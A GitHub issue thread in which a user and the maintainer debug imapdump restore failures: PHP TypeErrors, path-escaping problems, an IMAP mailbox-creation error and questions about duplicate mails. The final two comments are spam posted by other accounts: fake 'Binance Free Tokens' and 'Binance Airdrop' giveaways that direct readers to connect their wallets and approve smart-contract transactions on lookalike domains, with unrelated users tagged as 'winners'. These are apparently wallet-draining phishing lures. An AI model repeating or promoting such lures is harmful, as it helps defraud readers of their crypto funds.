### ISSUE TITLE
Issue from restoring mailbox

### ISSUE THREAD

**Issue by RomyxBaps** [arkadiusjonczek/imapdump#14]
Hi,

I have an error when i try to restore a directory inside my INBOX mailbox : 
```
php73 imapdump restore host.mail.net xxxxxx@yyyyy.zzz backup_mail/2021-02-23_17\:25\:47/xxxxxx\@yyyyyy.zz/INBOX/BIBLIOTHEQUE\ LA\ VILLETTE/
Restoring Mailbox "Test"
Mailbox "Test" not found -> Creating..
PHP Fatal error:  Uncaught TypeError: Return value of "ImapDump\Command\RestoreCommand::execute()" must be of the type int, "null" returned. in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php:259
Stack trace:
#0 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(971): Symfony\Component\Console\Command\Command->run(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#1 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(290): Symfony\Component\Console\Application->doRunCommand(Object(ImapDump\Command\RestoreCommand), Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#2 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(166): Symfony\Component\Console\Application->doRun(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#3 /volume1/ImapBackup/imapdump-master/imapd in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php on line 259

Fatal error: Uncaught TypeError: Return value of "ImapDump\Command\RestoreCommand::execute()" must be of the type int, "null" returned. in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php:259
Stack trace:
#0 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(971): Symfony\Component\Console\Command\Command->run(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#1 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(290): Symfony\Component\Console\Application->doRunCommand(Object(ImapDump\Command\RestoreCommand), Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#2 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(166): Symfony\Component\Console\Application->doRun(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#3 /volume1/ImapBackup/imapdump-master/imapd in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php on line 259
``` 
What is the problem ? The "space" in the name is maybe the probleme but it's okay with an other mailbox with a name with spaces.

**Comment by arkadiusjonczek** [comment]
Hi @RomyxBaps ,
there is not enough information.. could you try to increase the verbosity?
```
php73 imapdump -vvv restore host.mail.net xxxxxx@yyyyy.zzz backup_mail/2021-02-23_17\:25\:47/xxxxxx\@yyyyyy.zz/INBOX/BIBLIOTHEQUE\ LA\ VILLETTE/
```

**Comment by RomyxBaps** [comment]
Sure, here is the -vvv option output : 
```
PHP Warning:  scandir(backup_mail/2021-02-23_17\:25\:47/xxxxxx\@yyyyyy.zz/INBOX/BIBLIOTHEQUE\ LA\ VILLETTE/): failed to open dir: No such file or directory in /volume1/ImapBackup/imapdump-master/src/ImapDump/Command/RestoreCommand.php on line 27

Warning: scandir(backup_mail/2021-02-23_17\:25\:47/xxxxxx\@yyyyyy.zz/INBOX/BIBLIOTHEQUE\ LA\ VILLETTE/): failed to open dir: No such file or directory in /volume1/ImapBackup/imapdump-master/src/ImapDump/Command/RestoreCommand.php on line 27
PHP Warning:  scandir(): (errno 2): No such file or directory in /volume1/ImapBackup/imapdump-master/src/ImapDump/Command/RestoreCommand.php on line 27

Warning: scandir(): (errno 2): No such file or directory in /volume1/ImapBackup/imapdump-master/src/ImapDump/Command/RestoreCommand.php on line 27
PHP Warning:  Invalid argument supplied for foreach() in /volume1/ImapBackup/imapdump-master/src/ImapDump/Command/RestoreCommand.php on line 29

Warning: Invalid argument supplied for foreach() in /volume1/ImapBackup/imapdump-master/src/ImapDump/Command/RestoreCommand.php on line 29
PHP Fatal error:  Uncaught TypeError: Return value of "ImapDump\Command\RestoreCommand::execute()" must be of the type int, "null" returned. in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php:259
Stack trace:
#0 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(971): Symfony\Component\Console\Command\Command->run(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#1 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(290): Symfony\Component\Console\Application->doRunCommand(Object(ImapDump\Command\RestoreCommand), Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#2 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(166): Symfony\Component\Console\Application->doRun(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#3 /volume1/ImapBackup/imapdump-master/imapd in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php on line 259

Fatal error: Uncaught TypeError: Return value of "ImapDump\Command\RestoreCommand::execute()" must be of the type int, "null" returned. in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php:259
Stack trace:
#0 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(971): Symfony\Component\Console\Command\Command->run(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#1 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(290): Symfony\Component\Console\Application->doRunCommand(Object(ImapDump\Command\RestoreCommand), Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#2 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(166): Symfony\Component\Console\Application->doRun(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#3 /volume1/ImapBackup/imapdump-master/imapd in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php on line 259
```
The directory "backup_mail/2021-02-23_17\:25\:47/xxxxxx\@yyyyyy.zz/INBOX/BIBLIOTHEQUE\ LA\ VILLETTE/" exist :

**Comment by arkadiusjonczek** [comment]
As you can see there is something wrong with the given path.

Please try the following things:
- Using an absolute path e.g. `/home/username/backup/`
- Using quotes instead of escaping whitespaces e.g. `php73 imapdump restore host.mail.net xxxxxx@yyyyy.zzz "this/is/my/backup path"`

**Comment by RomyxBaps** [comment]
Okay, without  the ' \ ' and with quote and an absolute path, the error scandir disappeart but the rest is still here : 
```
Restoring Mailbox "Test"
Mailbox "Test" already exists
PHP Fatal error:  Uncaught TypeError: Return value of "ImapDump\Command\RestoreCommand::execute()" must be of the type int, "null" returned. in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php:259
Stack trace:
#0 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(971): Symfony\Component\Console\Command\Command->run(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#1 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(290): Symfony\Component\Console\Application->doRunCommand(Object(ImapDump\Command\RestoreCommand), Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#2 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(166): Symfony\Component\Console\Application->doRun(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#3 /volume1/ImapBackup/imapdump-master/imapd in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php on line 259

Fatal error: Uncaught TypeError: Return value of "ImapDump\Command\RestoreCommand::execute()" must be of the type int, "null" returned. in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php:259
Stack trace:
#0 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(971): Symfony\Component\Console\Command\Command->run(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#1 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(290): Symfony\Component\Console\Application->doRunCommand(Object(ImapDump\Command\RestoreCommand), Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#2 /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Application.php(166): Symfony\Component\Console\Application->doRun(Object(Symfony\Component\Console\Input\ArgvInput), Object(Symfony\Component\Console\Output\ConsoleOutput))
#3 /volume1/ImapBackup/imapdump-master/imapd in /volume1/ImapBackup/imapdump-master/vendor/symfony/console/Command/Command.php on line 259
```
The error change a little bit, now, the mailbox "Test" is find by the script.

**Comment by arkadiusjonczek** [comment]
Did you run the command using the `-vvv` parameter?

**Comment by RomyxBaps** [comment]
Sorry for the late answer, yes the command was launch with the option -vvv.

**Comment by arkadiusjonczek** [comment]
Which commit is checked out in your cloned directory? You can use `git show --oneline -s` in your directory to find it out.

**Comment by RomyxBaps** [comment]
Here is the stdout of the command : 
```
ebd2603 (HEAD -> master, origin/master, origin/HEAD) Merge pull request #8 from arkadiusjonczek/dependabot/composer/phpunit/phpunit-9.5.0
```

**Comment by arkadiusjonczek** [comment]
Okay thanks. Maybe the autoupdates from dependabot broke something.
Can you please checkout an older commit with `git checkout 2e629fc8123af28077dbca6428029f594c5524b7` and retry the restore command?

**Comment by RomyxBaps** [comment]
Okay all is good. 
With the git checkout and the path without ' "' ' the restoration is good ! Thank you a lot for your answers !

**Comment by arkadiusjonczek** [comment]
Okay nice. I'll fix this soon. Thank you for your patience.

**Comment by RomyxBaps** [comment]
Hi,

The joy was short :/

I have a new error when I try to restore the entire mailbox : 
```
Restoring Mailbox "Test with space"
Mailbox "Test with space" not found -> Creating..
Restoring Message "ACT"
Restoring Message "Conception"
Restoring Message "New"
Restoring Mailbox "BIBLIOTHEQUE LA VILLETTE"
Mailbox "BIBLIOTHEQUE LA VILLETTE" not found -> Creating..

In Connection.php line 186:
                                                                                                                          
  [Ddeboer\Imap\Exception\CreateMailboxException]                                                                         
  Can not create "BIBLIOTHEQUE LA VILLETTE" mailbox at "{xxx.mail.net:993/imap/notls/ssl/user="xxxxx@yyyyyy.zz"}"  
  imap_alerts (0):                                                                                                        
  imap_errors (7):                                                                                                        
  - IMAP protocol error: Command Argument Error. 12                                                                       
  - Command Argument Error. 12                                                                                            
  - IMAP protocol error: Command Argument Error. 12                                                                       
  - Command Argument Error. 12                                                                                            
  - IMAP protocol error: Command Argument Error. 12                                                                       
  - Command Argument Error. 12                                                                                            
  - [CLOSED] IMAP connection broken (server response)                                                                     
                                                                                                                          

Exception trace:
  at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/ddeboer/imap/src/Connection.php:186
 Ddeboer\Imap\Connection->createMailbox() at /volume1/ImapBackup/imapbackup_checkout/imapdump/src/ImapDump/Command/RestoreCommand.php:48
 ImapDump\Command\RestoreCommand->execute() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Command/Command.php:255
 Symfony\Component\Console\Command\Command->run() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Application.php:1011
 Symfony\Component\Console\Application->doRunCommand() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Application.php:272
 Symfony\Component\Console\Application->doRun() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Application.php:148
 Symfony\Component\Console\Application->run() at /volume1/ImapBackup/imapbackup_checkout/imapdump/imapdump:15

restore <host> <username> <source>
```
The folder "BIBLIOTHEQUE LA VILLETTE" exist on the webmail and the commande imapdump was launch with -vvv.

**Comment by arkadiusjonczek** [comment]
Mhh this seems like an error from the Mail Server. Which one are you using?
Since you tried another Mailbox with whitespaces (Test with space) I think this is not a problem with whitespaces on Mailbox "BIBLIOTHEQUE LA VILLETTE". Maybe the name is too long? Could you please retry with a shorter name.

**Comment by RomyxBaps** [comment]
With a shorter name it's okay and with a longer name too : 
```
Restoring Mailbox "AAAA BBBBB CCCCC DDDDDD EEEEEE"
Mailbox "AAAA BBBBB CCCCC DDDDDD EEEEEE" not found -> Creating..
Restoring Mailbox "Test1"
Mailbox "Test1" already exists
Restoring Message "AZER"
Restoring Message "QSDFG"
Restoring Message "WXCVBNMPL"
Restoring Mailbox "BIBLIOTHEQUE LA VILLETTE"
Mailbox "BIBLIOTHEQUE LA VILLETTE" not found -> Creating..

In Connection.php line 186:
                                                                                                                          
  [Ddeboer\Imap\Exception\CreateMailboxException]                                                                         
  Can not create "BIBLIOTHEQUE LA VILLETTE" mailbox at "{mx.mail.net:993/imap/notls/ssl/user="xxxxxxxxxx@yyyyyy.zz"}"  
  imap_alerts (0):                                                                                                        
  imap_errors (7):                                                                                                        
  - IMAP protocol error: Command Argument Error. 12                                                                       
  - Command Argument Error. 12                                                                                            
  - IMAP protocol error: Command Argument Error. 12                                                                       
  - Command Argument Error. 12                                                                                            
  - IMAP protocol error: Command Argument Error. 12                                                                       
  - Command Argument Error. 12                                                                                            
  - [CLOSED] IMAP connection broken (server response)                                                                     
                                                                                                                          

Exception trace:
  at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/ddeboer/imap/src/Connection.php:186
 Ddeboer\Imap\Connection->createMailbox() at /volume1/ImapBackup/imapbackup_checkout/imapdump/src/ImapDump/Command/RestoreCommand.php:48
 ImapDump\Command\RestoreCommand->execute() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Command/Command.php:255
 Symfony\Component\Console\Command\Command->run() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Application.php:1011
 Symfony\Component\Console\Application->doRunCommand() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Application.php:272
 Symfony\Component\Console\Application->doRun() at /volume1/ImapBackup/imapbackup_checkout/imapdump/vendor/symfony/console/Application.php:148
 Symfony\Component\Console\Application->run() at /volume1/ImapBackup/imapbackup_checkout/imapdump/imapdump:15

restore <host> <username> <source>
```

**Comment by RomyxBaps** [comment]
Just for my information.
When I want to restore all the mailbox, I need to declare the path like this : 
```
/folder/where/my/backup/are/xxxxxxx@yyyyy.zz/
```
or
```
/folder/where/my/backup/are/xxxxxxx@yyyyy.zz/INBOX/
```
?

**Comment by arkadiusjonczek** [comment]
The first path should be the right one but this can be dependant from the mail provider. I had one provider where I could only create directories (called mailbox in IMAP) under INBOX directory but another provider allowed to create directories on root level.

The error is weird. Are there any hidden characters oder something in the name? Could you please try to create mailbox/directory "BIBLIOTHEQUE LA VILLETTE" by hand and see if there are any more errors?

**Comment by RomyxBaps** [comment]
I'll try with the first path.

The directory can be created on the webmail.

An other error when a i backup all the mailbox : 
```
Backup Mailbox "Calendrier" with 316 messages

In Message.php line 175:
                                    
  Message "99" has invalid headers  
  imap_alerts (0):                  
  imap_errors (0):                  
                                    

backup <host> <username> <destination>
```
What's the problem ?

**Comment by RomyxBaps** [comment]
Also, when I backup my mailbox and restore it just after, i have a lot of mail that are restored while I delete no mail.

**Comment by arkadiusjonczek** [comment]
> Message "99" has invalid headers 

Can you look up the headers of the mail? Maybe there are custom headers or something that are not supported by the IMAP library.

> Also, when I backup my mailbox and restore it just after, i have a lot of mail that are restored while I delete no mail.

You mean you have duplicate mails after restore? This could be a problem with special characters. Which language is this? French?

**Comment by RomyxBaps** [comment]
> > Message "99" has invalid headers
> 
> Can you look up the headers of the mail? Maybe there are custom headers or something that are not supported by the IMAP library.
> 
I'll have a look if i find something interesting
> > Also, when I backup my mailbox and restore it just after, i have a lot of mail that are restored while I delete no mail.
> 
> You mean you have duplicate mails after restore? This could be a problem with special characters. Which language is this? French?

Yes it's french (space and accent on some directory..)

**Comment by arkadiusjonczek** [comment]
> Yes it's french (space and accent on some directory..)

Can you please give me an example mail (I think mail subject is important) which will be restored although it exists in the target.

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by fahirazm** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @laptopfrog, @jsanchezramos, @speysfic, @minhsieh, @atanu2531, @streger, @likeprogrsv
